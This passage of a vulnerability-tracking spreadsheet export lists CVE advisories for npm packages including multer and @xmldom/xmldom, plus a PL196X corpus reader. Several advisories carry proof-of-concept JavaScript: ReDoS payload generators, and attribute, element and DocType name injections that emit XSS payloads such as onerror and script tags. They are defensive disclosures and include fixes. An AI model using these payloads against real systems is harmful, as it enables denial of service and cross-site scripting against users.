- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T1613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="1614"><c r="A1614" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1614" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D1614" s="5" t="inlineStr" /><c r="E1614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1614" s="5" t="inlineStr" /><c r="H1614" s="5" t="n"><v>0.003</v></c><c r="I1614" s="5" t="inlineStr" /><c r="J1614" s="5" t="inlineStr" /><c r="K1614" s="5" t="inlineStr" /><c r="L1614" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1614" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1614" s="5" t="inlineStr" /><c r="R1614" s="5" t="inlineStr" /><c r="S1614" s="5" t="inlineStr"><is><t>### Impact

multer is vulnerable to a Denial of Service (DoS) via a crafted array index in multipart field names. The `append-field` dependency parses bracket notation in field names, and a large numeric index such as `items[4294967294]` forces allocation of a maximum-length sparse array. A following field with a non-numeric key on the same base then converts that array to an object by iterating its full length, which consumes CPU synchronously and leaves the process unable to handle other requests. A single HTTP request with a crafted multipart body is sufficient to exploit this, and it affects multer 1.x and 2.x.

### Patches

Users should upgrade to `2.3.0` and configure `limits.fieldArrayIndexLimit` to the minimum array index their application requires.

### Workarounds

None.</t></is></c><c r="T1614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="1615"><c r="A1615" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1615" s="5" t="inlineStr"><is><t>CVE-2026-82514</t></is></c><c r="D1615" s="5" t="inlineStr" /><c r="E1615" s="5" t="inlineStr" /><c r="F1615" s="5" t="inlineStr" /><c r="G1615" s="5" t="inlineStr" /><c r="H1615" s="5" t="inlineStr" /><c r="I1615" s="5" t="inlineStr" /><c r="J1615" s="5" t="inlineStr" /><c r="K1615" s="5" t="inlineStr" /><c r="L1615" s="5" t="inlineStr" /><c r="M1615" s="5" t="inlineStr" /><c r="N1615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1615" s="5" t="inlineStr" /><c r="R1615" s="5" t="inlineStr" /><c r="S1615" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t></is></c></row><row r="1616"><c r="A1616" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1616" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D1616" s="5" t="inlineStr" /><c r="E1616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1616" s="5" t="inlineStr" /><c r="H1616" s="5" t="n"><v>0.003</v></c><c r="I1616" s="5" t="inlineStr" /><c r="J1616" s="5" t="inlineStr" /><c r="K1616" s="5" t="inlineStr" /><c r="L1616" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1616" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1616" s="5" t="inlineStr" /><c r="R1616" s="5" t="inlineStr" /><c r="S1616" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="1617"><c r="A1617" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1617" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D1617" s="5" t="inlineStr" /><c r="E1617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1617" s="5" t="inlineStr" /><c r="H1617" s="5" t="n"><v>0.003</v></c><c r="I1617" s="5" t="inlineStr" /><c r="J1617" s="5" t="inlineStr" /><c r="K1617" s="5" t="inlineStr" /><c r="L1617" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1617" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1617" s="5" t="inlineStr" /><c r="R1617" s="5" t="inlineStr" /><c r="S1617" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T1617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="1618"><c r="A1618" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1618" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D1618" s="5" t="inlineStr" /><c r="E1618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1618" s="5" t="inlineStr" /><c r="H1618" s="5" t="n"><v>0.003</v></c><c r="I1618" s="5" t="inlineStr" /><c r="J1618" s="5" t="inlineStr" /><c r="K1618" s="5" t="inlineStr" /><c r="L1618" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1618" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1618" s="5" t="inlineStr" /><c r="R1618" s="5" t="inlineStr" /><c r="S1618" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="1619"><c r="A1619" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1619" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D1619" s="5" t="inlineStr" /><c r="E1619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1619" s="5" t="inlineStr" /><c r="H1619" s="5" t="n"><v>0.003</v></c><c r="I1619" s="5" t="inlineStr" /><c r="J1619" s="5" t="inlineStr" /><c r="K1619" s="5" t="inlineStr" /><c r="L1619" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1619" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1619" s="5" t="inlineStr" /><c r="R1619" s="5" t="inlineStr" /><c r="S1619" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
